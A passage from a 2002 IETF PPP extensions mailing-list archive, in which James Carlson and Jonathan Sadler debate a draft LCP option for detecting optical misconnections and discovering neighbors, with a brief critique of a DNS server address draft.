> not describe exactly when and how this hand-off occurs, it does not
> describe what happens if the peer attempts to restart LCP (unless
> physical end-to-end signaling is always required, and that's not a
> requirement of PPP), and it does not describe how this feature
> interacts with the existing suite of PPP features (e.g.,
> Authentication, CHAP rechallenge, LQM, MP, CCP, ECP, and basic LCP
> Echo-Request/Response).

There is no interaction with any of the other PPP protocols -- it is
specifically for identifying a link property.

> An alternative -- one that would require no changes to PPP at all --
> would be an agreement by the peers to use PAP or EAP to exchange
> identities, and to place the link identity in the "peer name" field.
> Since this proposal is an identification mechanism, it seems logical
> to use the existing identification mechanisms to support it.

None of these mechanisms happen early enough to allow them to be used
for misconnection detection.

> However, this proposal also appears to be using PPP as though it were
> a one-shot exchange, which is not the case.  This is troubling in
> terms of the feature support outlined above.

The one-shot use is similar to what happens today if a PPP line is
started and there is a mismatch that prevents proper negotiation of a
protocol above LCP.  (eg. authentication mismatch, NCP configuration
mismatch, supported NCP mismatch, etc.)

> It seems to me that a
> new protocol -- say, "one time identity exchange protocol" -- would be
> preferable to redefinition of all of the PPP subprotocols to fit in
> this context.

There are many benefits in using PPP as opposed to defining a new
protocol, most noteably:
 - It leverages the existing PPP code-base 
 - It doesn't have to go through the pains of interoperability testing
 - It removes the issue of having to distingush between PPP and the
   "other" protocol.
 - It provides the opportunity for non-router devices to learn the
   identity of a router without requiring routers to do significant
   software development.

I'm not certain why you say this is redefining the PPP subprotocols.  It
is an extension to the LCP option set only.  No other PPP sub-protocol
is touched.

> There are other issues with the draft (e.g., the session ID doesn't
> appear to be necessary, since the peers themselves already know over
> which port they're communicating -- there can be only one session on
> any given peer-to-peer connection), but I think those can wait until
> the fundamental questions are addressed.

Actually, the session ID is a hold over from the LMP test message that
this draft is attempting to replace.  I agree that it is not necessary.

If you have been following the work in the CCAMP WG, you will notice
that LMP is proposing a non-standard use of PPP to carry the test
message.  Specifically, they are looking to send the this IP-based
message without the successful negotiation of LCP or IPCP.

This draft proposes a mechanism to do the same thing as the test message
without violating the requirement stated in RFC 1661 that LCP and NCPs
MUST be succesfully negotiated before sending IP frames.

Jonathan Sadler

> --
> James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
> SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
> MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677
============================================================
The information contained in this message may be privileged 
and confidential and protected from disclosure.  If the 
reader of this message is not the intended recipient, or an 
employee or agent responsible for delivering this message to 
the intended recipient, you are hereby notified that any 
reproduction, dissemination or distribution of this 
communication is strictly prohibited. If you have received 
this communication in error, please notify us immediately by 
replying to the message and deleting it from your computer.

Thank you.
Tellabs
============================================================


From owner-ietf-ppp@merit.edu  Tue Jun  4 15:32:46 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA11776
	for <pppext-archive@odin.ietf.org>; Tue, 4 Jun 2002 15:32:46 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 2E82B91233; Tue,  4 Jun 2002 15:32:53 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id EA75991248; Tue,  4 Jun 2002 15:32:52 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id E23A591233
	for <ietf-ppp@trapdoor.merit.edu>; Tue,  4 Jun 2002 15:32:51 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 7C18C5DDD0; Tue,  4 Jun 2002 15:32:46 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from patan.sun.com (patan.Sun.COM [192.18.98.43])
	by segue.merit.edu (Postfix) with ESMTP id 4B39B5DD94
	for <ietf-ppp@merit.edu>; Tue,  4 Jun 2002 15:32:46 -0400 (EDT)
Received: from eastmail1.East.Sun.COM ([129.148.1.240])
	by patan.sun.com (8.9.3+Sun/8.9.3) with ESMTP id NAA16227;
	Tue, 4 Jun 2002 13:34:02 -0600 (MDT)
Received: from phorcys.east.sun.com (phorcys.East.Sun.COM [129.148.174.143])
	by eastmail1.East.Sun.COM (8.9.3+Sun/8.9.3/ENSMAIL,v2.1p1) with ESMTP id PAA15363;
	Tue, 4 Jun 2002 15:32:50 -0400 (EDT)
Received: from phorcys.east.sun.com (localhost [127.0.0.1])
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3) with ESMTP id g54JWl6V138292;
	Tue, 4 Jun 2002 15:32:47 -0400 (EDT)
Received: (from carlsonj@localhost)
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3/Submit) id g54JWkxL138289;
	Tue, 4 Jun 2002 15:32:46 -0400 (EDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15613.5598.246368.240705@gargle.gargle.HOWL>
Date: Tue, 4 Jun 2002 15:32:46 -0400
From: James Carlson <james.d.carlson@east.sun.com>
To: jonathan.sadler@tellabs.com
Cc: Ben.Mack-Crane@tellabs.com, ietf-ppp@merit.edu
Subject: Re: I-D ACTION:draft-sadler-pppext-disc-01.txt
In-Reply-To: Jonathan Sadler's message of 4 June 2002 13:35:23
References: <H0000c0804978bf6.1023201667.mailw02@MHS>
	<3CFD086B.C7A17360@tellabs.com>
X-Mailer: VM 7.01 under Emacs 21.2.1
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

Jonathan Sadler writes:
> Misconnection detection identifies the fact that an RX/TX pair has not
> been correctly terminated on a corresponding RX/TX pair on the remote
> end.

Understood.

> This is not the same as misconfiguration of a PPP option.

It *is*, however, exactly identical to the misconfiguration that PPP
option negotiation is designed to detect.  Negotiation will fail to
converge if the peers do not have a bidirectional data path.

> > What the document seems to be saying above is also true of
> > any NCP that runs over PPP: one doesn't want to have a simple
> > misconfiguration result in a bad link being established.
> 
> Your statement has the following two corollaries:
>   - LCP is the only place that Misconnection detection can
>     be accomplished as LCP cannot successfully negotiate if
>     there is a Misconnection.  If LCP cannot successfully
>     negotiate then no NCP will be started, thereby making
>     it impossible for an NCP to identify a misconnection.

This is false.  Detection of misconnections is done at each level in
PPP -- LCP is merely one component, and by no means the only one.

In particular, suppose I have a regular PPP link between hosts A and
B.  I manage to fat-finger the punch list for the SONET interconnect,
and I end up instead with a connection between A and C.  LCP still
comes up, since I happen to have PPP implemented on C as well, but
then one of the two things then happens:

	- authentication fails because A has credentials for B
	  associated with this port.

	- when IPCP attempts to negotiate, A gets the wrong IP-Address
          in the Configure-Request, sends Configure-Nak, then goes
          into a request/nak loop until the link falls down.

In neither case does the link come up.  That's the point of PPP
negotiation: preventing misconfigured links from being established.
It's not merely an LCP function.

>   - The fact that LCP will not negotiate to the OPEN state on a
>     link because of a Misconnection (not misconfiguration) is good.
> 
> I agree with both of these ideas.  We are not looking to change the
> behavior of LCP with respect to negotiating into the OPEN state.

This proposal is (in some ways) very reminiscent of the old LCP-based
authentication proposal.  You're doing endpoint identification.

There are lots of ways to do this.  You can hijack the existing LCP
Endpoint Discriminator option from RFC 1990.  You can encode this
information in the authentication data passed via PAP/CHAP/EAP.  I
don't see that you need a new LCP option to do it.

That's setting aside, of course, whether PPP belongs here at all.

> Consequently, knowing the ID of the port that a span has connected to
> will provide significant help in figuring out where the misconnection
> is.

True.  You already have to modify the PPP code to support *something*
to identify links.  If you put the modification into the existing
mechanisms, then nobody else needs to know about this usage.

> > That doesn't
> > mean that all NCPs should be negotiated in LCP.
> 
> Agreed.  However, we are not looking to create an NCP.  This is
> specifically to identify a property of a link (specifically, the
> identity of the neighboring equipment) that is independent of the
> Network Layer protocols used above it.  The Address being passed is just
> a "cookie" -- it has no meaning with respect to the USE of the bearer.

Actually, I suspect that it may well be used there.  A protocol like
this that can identify endpoints for validation purposes can *also* be
used for discovering the peer's identity in a dynamic situation.  In
other words, it's exactly analogous to IPCP's negotiation: it can be
used just to validate that the right peers are talking (the original
intent, based on experience with SLIP) or it can be used to distribute
information.

> > If I understand this draft correctly, it proposes having LCP
> > negotiate, go to Opened state, and then somehow, at some point,
> > release the port so that some other non-PPP service ('TDM') can use
> > the port.
> 
> For ports that don't support an NCP, this is correct.  The "somehow, at
> some point" is immediately after sucessful LCP negotiation.  The release
> is accomplished using the existing "Send-Termination-Request" message so
> it is not redefining the operation of the LCP state machine.

This behavior isn't actually documented in the draft.  In addition,
per RFC 1661, action 'str' is done only when someone invokes Close on
LCP or on abject failure.  This eventually results in 'tlf' being
sent, and the physical layer being torn down (for whatever "torn down"
might mean in this context).

Thus, I think this does imply some changes, since the link remains
usable even though LCP is destroyed.

> If a port does support an NCP, then the port would continue to negotiate
> MLPPP, Authentication, and the NCP just like PPP does today.

So, then, how does this differ from the existing authentication
protocols?

> > interacts with the existing suite of PPP features (e.g.,
> > Authentication, CHAP rechallenge, LQM, MP, CCP, ECP, and basic LCP
> > Echo-Request/Response).
> 
> There is no interaction with any of the other PPP protocols -- it is
> specifically for identifying a link property.

You gave part of the answer above -- you expect a switch into TDM mode
if there are no NCPs expected.  Exactly how the peers know that this
is the case (how do you know when something is not coming?), and when
the switch takes effect (after LCP goes down?) should be part of the
draft.

> > An alternative -- one that would require no changes to PPP at all --
> > would be an agreement by the peers to use PAP or EAP to exchange
> > identities, and to place the link identity in the "peer name" field.
> > Since this proposal is an identification mechanism, it seems logical
> > to use the existing identification mechanisms to support it.
> 
> None of these mechanisms happen early enough to allow them to be used
> for misconnection detection.

I don't understand that.  How is LCP acceptable but authentication
unacceptable?  If LCP fails, the link fails.  If authentication fails,
the link fails.

What exactly is the difference there?

> > However, this proposal also appears to be using PPP as though it were
> > a one-shot exchange, which is not the case.  This is troubling in
> > terms of the feature support outlined above.
> 
> The one-shot use is similar to what happens today if a PPP line is
> started and there is a mismatch that prevents proper negotiation of a
> protocol above LCP.  (eg. authentication mismatch, NCP configuration
> mismatch, supported NCP mismatch, etc.)

But, then, the link is left down.  This case uses PPP as though it
were a way to say "hello" to the peer, and then disconnect, secure in
the knowledge that the peer is somehow still there.

> > It seems to me that a
> > new protocol -- say, "one time identity exchange protocol" -- would be
> > preferable to redefinition of all of the PPP subprotocols to fit in
> > this context.
> 
> There are many benefits in using PPP as opposed to defining a new
> protocol, most noteably:
>  - It leverages the existing PPP code-base 

It proposes a code change that everyone has to support.

>  - It doesn't have to go through the pains of interoperability testing

The switch-over to TDM mode sounds significant to me.  You need to be
able to switch to it and back (somehow) without getting PPP confused.
LCP messages are used for this on normal PPP links.  I don't see what
keeps PPP in synchronization here.

>  - It removes the issue of having to distingush between PPP and the
>    "other" protocol.

Do you have to distinguish between PPP and Cisco HDLC?  Or between PPP
and ATM?

I don't think that goes away.

>  - It provides the opportunity for non-router devices to learn the
>    identity of a router without requiring routers to do significant
>    software development.
> 
> I'm not certain why you say this is redefining the PPP subprotocols.  It
> is an extension to the LCP option set only.  No other PPP sub-protocol
> is touched.

That's exactly what I'm saying.  I don't see the need for changes to
PPP at all for this particular application.

> > There are other issues with the draft (e.g., the session ID doesn't
> > appear to be necessary, since the peers themselves already know over
> > which port they're communicating -- there can be only one session on
> > any given peer-to-peer connection), but I think those can wait until
> > the fundamental questions are addressed.
> 
> Actually, the session ID is a hold over from the LMP test message that
> this draft is attempting to replace.  I agree that it is not necessary.

OK.

> If you have been following the work in the CCAMP WG, you will notice
> that LMP is proposing a non-standard use of PPP to carry the test
> message.  Specifically, they are looking to send the this IP-based
> message without the successful negotiation of LCP or IPCP.

Actually, no, I've been trying to ignore CCAMP.  I just picked up
again because of this draft ...

> This draft proposes a mechanism to do the same thing as the test message
> without violating the requirement stated in RFC 1661 that LCP and NCPs
> MUST be succesfully negotiated before sending IP frames.

I'm not sure that this proposal is necessarily better.

By prior arrangement, peers can certainly send IP packets without
doing LCP and NCP.  That's what all of the old HDLC-based protocols
used to do.  Of course, such a hack is never really necessary.

That is to say, I don't see the need for either case.

Instead, I think that whatever is used for OAM functionality on that
TDM interface ought to be used for identification.  That allows the
port to stay in TDM mode all the time, be managed, and work without
having to invoke PPP at all.

-- 
James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677


From owner-ietf-ppp@merit.edu  Wed Jun  5 11:58:43 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA04455
	for <pppext-archive@odin.ietf.org>; Wed, 5 Jun 2002 11:58:43 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 55DF891270; Wed,  5 Jun 2002 11:58:39 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 2790091275; Wed,  5 Jun 2002 11:58:39 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 27C2F91270
	for <ietf-ppp@trapdoor.merit.edu>; Wed,  5 Jun 2002 11:58:38 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id D64D25DEC6; Wed,  5 Jun 2002 11:58:32 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from pheriche.sun.com (pheriche.sun.com [192.18.98.34])
	by segue.merit.edu (Postfix) with ESMTP id 39F215DEA0
	for <ietf-ppp@merit.edu>; Wed,  5 Jun 2002 11:58:32 -0400 (EDT)
Received: from eastmail2.East.Sun.COM ([129.148.1.241])
	by pheriche.sun.com (8.9.3+Sun/8.9.3) with ESMTP id JAA12509;
	Wed, 5 Jun 2002 09:58:39 -0600 (MDT)
Received: from phorcys.east.sun.com (phorcys.East.Sun.COM [129.148.174.143])
	by eastmail2.East.Sun.COM (8.9.3+Sun/8.9.3/ENSMAIL,v2.1p1) with ESMTP id LAA00403;
	Wed, 5 Jun 2002 11:58:38 -0400 (EDT)
Received: from phorcys.east.sun.com (localhost [127.0.0.1])
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3) with ESMTP id g55FwY6V141922;
	Wed, 5 Jun 2002 11:58:34 -0400 (EDT)
Received: (from carlsonj@localhost)
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3/Submit) id g55FwYuo141919;
	Wed, 5 Jun 2002 11:58:34 -0400 (EDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15614.13610.120869.311924@gargle.gargle.HOWL>
Date: Wed, 5 Jun 2002 11:58:34 -0400
From: James Carlson <james.d.carlson@east.sun.com>
To: tom.hiller@lucent.com, gwz@cisco.com
Cc: pppext <ietf-ppp@merit.edu>
Subject: Re: I-D ACTION:draft-hiller-dns-addr-00.txt
In-Reply-To: Internet-Drafts@ietf.org's message of 27 February 2002 07:25:10
References: <200202271225.HAA18250@ietf.org>
X-Mailer: VM 7.01 under Emacs 21.2.1
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

Because I commented on the SIP server address draft, someone pointed
out this draft to me as well.  I somehow overlooked it the first time
around.  Sorry for the extreme time delay.

>  A major portion of the text in this memo was stolen from RFC 1877 
>  [8].

Indeed.  And the proposal is flawed for exactly the same reasons that
RFC 1877 is flawed.  These include:

	- There's no reason to expect that the "server" end of the
          connection can supply or that the "client" end can use these
          addresses.  It works only when the server has special
          configuration, and the client *happens* to also be running a
          local set of applications that care about DNS server
          addresses.  It fails utterly if either peer happens to be a
          mere router or bridge.

	- Using draft-ietf-dhc-dhcpv6-opt-dnsconfig-02.txt with
          DHCPINFORM gives simple support for this feature on PPP, as
          well as over any other medium that can carry UDP/IPv6.
          Having one mechanism rather than N (where N>1) is better.

	- The negotiation is backwards; the Configure-Request sender
          is somehow obliged to "guess" at the addresses of the DNS
          servers that actually reside on the other end of the link.

More fundamentally, DNS server addresses (and search paths, and boot
image names, and log hosts, and print servers, and home page URLs, and
so on) are application-level details.  PPP's NCPs are a mechanism for
negotiating link layer issues, such as proper numbering, naming, and
identification.  DNS resolver configuration is not a per-link issue.

-- 
James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677


From owner-ietf-ppp@merit.edu  Wed Jun  5 12:43:07 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA06051
	for <pppext-archive@odin.ietf.org>; Wed, 5 Jun 2002 12:43:06 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 480C791275; Wed,  5 Jun 2002 12:43:16 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 1195F91276; Wed,  5 Jun 2002 12:43:15 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 385D891275
	for <ietf-ppp@trapdoor.merit.edu>; Wed,  5 Jun 2002 12:43:15 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 029CF5DE9E; Wed,  5 Jun 2002 12:43:10 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from mx3.tellabs.com (mx3.tellabs.com [204.68.180.53])
	by segue.merit.edu (Postfix) with ESMTP id D54165DDF3
	for <ietf-ppp@merit.edu>; Wed,  5 Jun 2002 12:43:09 -0400 (EDT)
Received: from mailw02.hq.tellabs.com (mailw02.lisle.tellabs.com [172.23.207.12])
	by mx3.tellabs.com (Mirapoint)
	with ESMTP id AFW99819;
	Wed, 5 Jun 2002 11:41:58 -0500 (CDT)
Received: from tellabs.com (dhcp-172-23-111-24.lisle.tellabs.com [172.23.111.24]) by mailw02.hq.tellabs.com with ESMTP (8.8.6 (PHNE_17190)/8.7.1) id LAA22387; Wed, 5 Jun 2002 11:41:59 -0500 (CDT)
Message-ID: <3CFE3F56.86CF8ABF@tellabs.com>
Date: Wed, 05 Jun 2002 11:41:58 -0500
From: Jonathan Sadler <jonathan.sadler@tellabs.com>
Reply-To: jonathan.sadler@tellabs.com
X-Mailer: Mozilla 4.75 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: James Carlson <james.d.carlson@east.sun.com>
Cc: Ben.Mack-Crane@tellabs.com, ietf-ppp@merit.edu
Subject: Re: I-D ACTION:draft-sadler-pppext-disc-01.txt
References: <H0000c0804987a22.1023219301.mailw02@MHS>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

James -

James Carlson wrote:
> 
> Jonathan Sadler writes:
> > Misconnection detection identifies the fact that an RX/TX pair has not
> > been correctly terminated on a corresponding RX/TX pair on the remote
> > end.
> 
> Understood.
> 
> > This is not the same as misconfiguration of a PPP option.
> 
> It *is*, however, exactly identical to the misconfiguration that PPP
> option negotiation is designed to detect.  Negotiation will fail to
> converge if the peers do not have a bidirectional data path.

While PPP will have the same failure behavior for misconfiguration as
well as misconnection, the mechanism that is necessary to recover (ie
identify what the fault location is) is completely different.  We are
not looking to handle misconfiguration detection -- that is something
that can already be handled through policy/security mechanisms.  We are
specifically looking to identify the following misconnection cases:
   - Transmit/Receive reversal
   - Transmit/Receive half-connection
   - Transmit/Receive split 1 port -> 2 ports (1 NE -> 1 NE)
   - Transmit/Receive split 2 ports -> 2 ports (1 NE -> 1 NE)
   - Transmit/Receive split 1 NE -> 2 NEs

> > > What the document seems to be saying above is also true of
> > > any NCP that runs over PPP: one doesn't want to have a simple
> > > misconfiguration result in a bad link being established.
> >
> > Your statement has the following two corollaries:
> >   - LCP is the only place that Misconnection detection can
> >     be accomplished as LCP cannot successfully negotiate if
> >     there is a Misconnection.  If LCP cannot successfully
> >     negotiate then no NCP will be started, thereby making
> >     it impossible for an NCP to identify a misconnection.
> 
> This is false.  Detection of misconnections is done at each level in
> PPP -- LCP is merely one component, and by no means the only one.

The above listed misconnections cannot be identified by any protocol
other than LCP as LCP will never succesfully negotiate when one of these
misconnections exists.

Instead when one of the above listed misconnections occurs on a link,
the technician will see that LCP won't come up.  The technician will not
have any assistance in identifying why -- they'll at most see the
CONF-REQs coming from one or both ends in logs.  But they will not know
if its the wiring that is buggered up or if its a lower layer driver
problem or bad hardware.

This draft provides a mechanism that helps to isolate the source of the
problem.  While this may seem trivial for installations with a handful
of terminations, it is a problem for installations that have thousands
of terminations.

> In particular, suppose I have a regular PPP link between hosts A and
> B.  I manage to fat-finger the punch list for the SONET interconnect,
> and I end up instead with a connection between A and C.  LCP still
> comes up, since I happen to have PPP implemented on C as well, but
> then one of the two things then happens:
> 
>         - authentication fails because A has credentials for B
>           associated with this port.
> 
>         - when IPCP attempts to negotiate, A gets the wrong IP-Address
>           in the Configure-Request, sends Configure-Nak, then goes
>           into a request/nak loop until the link falls down.
> 
> In neither case does the link come up.  That's the point of PPP
> negotiation: preventing misconfigured links from being established.
> It's not merely an LCP function.

However, the current negotiation only focusses on attributes of the
particular sub-protocol being negotiated.  They do not provide any
tracing capability for the layer that exists below PPP.  This is what
this mechanism provides.

> >   - The fact that LCP will not negotiate to the OPEN state on a
> >     link because of a Misconnection (not misconfiguration) is good.
> >
> > I agree with both of these ideas.  We are not looking to change the
> > behavior of LCP with respect to negotiating into the OPEN state.
> 
> This proposal is (in some ways) very reminiscent of the old LCP-based
> authentication proposal.  You're doing endpoint identification.

While the mechanism looks similar, the purpose is very different. 
Authentication mechanisms typically assume bi-directional
communications, and therefore can easily be put into a separate
sub-protocol.  Misconnection detection as defined above can only occur
within LCP.  It cannot be turned into a sub-protocol.

> There are lots of ways to do this.  You can hijack the existing LCP
> Endpoint Discriminator option from RFC 1990.  You can encode this
> information in the authentication data passed via PAP/CHAP/EAP.  I
> don't see that you need a new LCP option to do it.

We actually considered using the Endpoint Discriminator option since it
has the same general format as the identifier we are looking to send but
decided against it because it is used to specifically identify an MLP
bundle that a link belongs to -- a completely different purpose than
misconnection detection and transport neighbor discovery.

> That's setting aside, of course, whether PPP belongs here at all.

Specifying a separate protocol leads to new development, new standards,
and new interoperability testing.  Further, some vendors may decide to
delay implementation due to the amount of additional work necessary. 
Adding an option to LCP the amount of work is considerably less (and
none if its use is out of scope for a vendor).

> > Consequently, knowing the ID of the port that a span has connected to
> > will provide significant help in figuring out where the misconnection
> > is.
> 
> True.  You already have to modify the PPP code to support *something*
> to identify links.  If you put the modification into the existing
> mechanisms, then nobody else needs to know about this usage.

However, putting it in a PPP sub-protocol other than LCP won't work as
LCP has to complete negotitation before any other protocol can start up.

> > > That doesn't
> > > mean that all NCPs should be negotiated in LCP.
> >
> > Agreed.  However, we are not looking to create an NCP.  This is
> > specifically to identify a property of a link (specifically, the
> > identity of the neighboring equipment) that is independent of the
> > Network Layer protocols used above it.  The Address being passed is just
> > a "cookie" -- it has no meaning with respect to the USE of the bearer.
> 
> Actually, I suspect that it may well be used there.  A protocol like
> this that can identify endpoints for validation purposes can *also* be
> used for discovering the peer's identity in a dynamic situation.  In
> other words, it's exactly analogous to IPCP's negotiation: it can be
> used just to validate that the right peers are talking (the original
> intent, based on experience with SLIP) or it can be used to distribute
> information.

The information is specifically providing an identifier for a link
endpoint independent of the Network Layer Protocols supported by the
link.  The identifier needs to have network scope so that the endpoint
can be uniquely identified by the operator/technician.

Currently, NCPs don't obtain Network Layer Addressing from LCP, and they
will not need to after introduction of this LCP option.

> > > If I understand this draft correctly, it proposes having LCP
> > > negotiate, go to Opened state, and then somehow, at some point,
> > > release the port so that some other non-PPP service ('TDM') can use
> > > the port.
> >
> > For ports that don't support an NCP, this is correct.  The "somehow, at
> > some point" is immediately after sucessful LCP negotiation.  The release
> > is accomplished using the existing "Send-Termination-Request" message so
> > it is not redefining the operation of the LCP state machine.
> 
> This behavior isn't actually documented in the draft.  In addition,
> per RFC 1661, action 'str' is done only when someone invokes Close on
> LCP or on abject failure.  This eventually results in 'tlf' being
> sent, and the physical layer being torn down (for whatever "torn down"
> might mean in this context).

Exactly -- a Close event would be generated by the neighbor discovery
manager.  I'll look to improve the text describing this.

> Thus, I think this does imply some changes, since the link remains
> usable even though LCP is destroyed.

It may imply changes in specific implementations -- but it is completely
consistent with the existing LCP state machine.

> > If a port does support an NCP, then the port would continue to negotiate
> > MLPPP, Authentication, and the NCP just like PPP does today.
> 
> So, then, how does this differ from the existing authentication
> protocols?

It differs in that it is not providing a mechanism for authenticating a
service user, but is instead providing a trace mechanism for a
misconnected bearer.

> > > interacts with the existing suite of PPP features (e.g.,
> > > Authentication, CHAP rechallenge, LQM, MP, CCP, ECP, and basic LCP
> > > Echo-Request/Response).
> >
> > There is no interaction with any of the other PPP protocols -- it is
> > specifically for identifying a link property.
> 
> You gave part of the answer above -- you expect a switch into TDM mode
> if there are no NCPs expected.  Exactly how the peers know that this
> is the case (how do you know when something is not coming?), and when
> the switch takes effect (after LCP goes down?) should be part of the
> draft.

Thanks for the recommendation -- I'll work on text to incorporate your
comments.

> > > An alternative -- one that would require no changes to PPP at all --
> > > would be an agreement by the peers to use PAP or EAP to exchange
> > > identities, and to place the link identity in the "peer name" field.
> > > Since this proposal is an identification mechanism, it seems logical
> > > to use the existing identification mechanisms to support it.
> >
> > None of these mechanisms happen early enough to allow them to be used
> > for misconnection detection.
> 
> I don't understand that.  How is LCP acceptable but authentication
> unacceptable?  If LCP fails, the link fails.  If authentication fails,
> the link fails.
> 
> What exactly is the difference there?

LCP must succeed for authentication to proceed.  Simple as that.  If you
are looking to solve a wiring problem that causes LCP to fail, you can't
expect authentication to assist.  Therefore either LCP or the bearer
need to provide the trace information needed to solve the problem.

> > > However, this proposal also appears to be using PPP as though it were
> > > a one-shot exchange, which is not the case.  This is troubling in
> > > terms of the feature support outlined above.
> >
> > The one-shot use is similar to what happens today if a PPP line is
> > started and there is a mismatch that prevents proper negotiation of a
> > protocol above LCP.  (eg. authentication mismatch, NCP configuration
> > mismatch, supported NCP mismatch, etc.)
> 
> But, then, the link is left down.  This case uses PPP as though it
> were a way to say "hello" to the peer, and then disconnect, secure in
> the knowledge that the peer is somehow still there.

Correct.  The expectation is that as long as the underlying bearer is
still operationally in service (eg. carrier is asserted, etc.) the
identity of the neighbor is not going to change.  And the draft states
in sec. 4.5 that if a link goes operationally out of service when it
returns to service neighbor discovery will be done again.

> > > It seems to me that a
> > > new protocol -- say, "one time identity exchange protocol" -- would be
> > > preferable to redefinition of all of the PPP subprotocols to fit in
> > > this context.
> >
> > There are many benefits in using PPP as opposed to defining a new
> > protocol, most noteably:
> >  - It leverages the existing PPP code-base
> 
> It proposes a code change that everyone has to support.

Only those vendors that want to provide a maintenance aid for optical
misconnections need to implement it.  Again, this has the most impact in
an environment with thousands of connections in a location.

> >  - It doesn't have to go through the pains of interoperability testing
> 
> The switch-over to TDM mode sounds significant to me.  You need to be
> able to switch to it and back (somehow) without getting PPP confused.
> LCP messages are used for this on normal PPP links.  I don't see what
> keeps PPP in synchronization here.

Once neighbor discovery/misconnection detection is complete, the LCP
session is closed, allowing a new LCP session to be initiated by the
remote endpoint.  Since the lower layer never went out of service, this
new session will not be terminated by the transport equipment.  If any
sort of cross connect is already in place any new LCP session attempted
by the end equipment will be continued to the remote endpoint of the
link.

> >  - It removes the issue of having to distingush between PPP and the
> >    "other" protocol.
> 
> Do you have to distinguish between PPP and Cisco HDLC?  Or between PPP
> and ATM?
>
> I don't think that goes away.

Good point.  Any recommendations on how to solve this?  I'll start
working on an approach...

--8<--SNIP-->8--

> Instead, I think that whatever is used for OAM functionality on that
> TDM interface ought to be used for identification.  That allows the
> port to stay in TDM mode all the time, be managed, and work without
> having to invoke PPP at all.

Unfortunately, the trace signals that exist on TDM interfaces are not
ubiquitous and don't use a common format leading to a variety of issues.
Consequently, in-band signals will be necessary.  This draft attempts to
define a common format using a ubiquitous protocol.

Jonathan Sadler

> --
> James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
> SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
> MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677
============================================================
The information contained in this message may be privileged 
and confidential and protected from disclosure.  If the 
reader of this message is not the intended recipient, or an 
employee or agent responsible for delivering this message to 
the intended recipient, you are hereby notified that any 
reproduction, dissemination or distribution of this 
communication is strictly prohibited. If you have received 
this communication in error, please notify us immediately by 
replying to the message and deleting it from your computer.

Thank you.
Tellabs
============================================================


From owner-ietf-ppp@merit.edu  Wed Jun  5 14:41:32 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA11484
	for <pppext-archive@odin.ietf.org>; Wed, 5 Jun 2002 14:41:32 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id BFF2691207; Wed,  5 Jun 2002 14:41:43 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
